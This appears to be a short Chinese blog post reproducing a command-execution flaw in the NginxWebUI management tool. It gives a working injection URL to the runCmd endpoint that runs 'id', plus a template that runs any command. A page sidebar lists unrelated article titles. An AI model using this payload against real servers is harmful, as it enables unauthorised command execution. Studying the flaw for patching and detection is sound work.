nginxWebUI runCmd命令执行漏洞复现

仲瑿2023-07-25 19:09

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
李日灐9 分钟前
<3>Linux 基础指令:从时间、查找、文本过滤到 .zip/.tgz 压缩解压与常用热键
linux·运维·服务器·开发语言·后端·面试·指令
木雷坞15 分钟前
2026年了,NAS拉个Docker镜像还要3小时?技术方案PK与实测对比 🚀
运维·docker·容器
hughnz15 分钟前
自动化控压钻井系统的挑战与风险
linux·服务器·网络
wanhengidc15 分钟前
云服务器和物理服务器的不同之处
运维·服务器·网络·网络协议·智能手机
色空大师17 分钟前
【linux开放端口-以8848为例】
linux·运维·服务器·防火墙
咋吃都不胖lyh19 分钟前
在 Linux 环境下,查看、编辑并使环境变量生效
linux·运维·服务器
神仙别闹20 分钟前
基于C++实现的简单的SMTP服务器
服务器·开发语言·c++
修心光22 分钟前
kuboard升级过程
运维
keyipatience24 分钟前
Linux 基本指令
linux·运维·服务器
信创DevOps先锋26 分钟前
Gitee DevOps平台:本土化创新如何重塑企业研发效能图谱
运维·gitee·devops
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛042026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free05GPT-6发布日深度解析-Symphony架构200万Token实战06基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南07GPT-6核心能力解析及与现有主流大模型对比08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)10从限购到畅通:GLM-5.1 Coding Plan接入攻略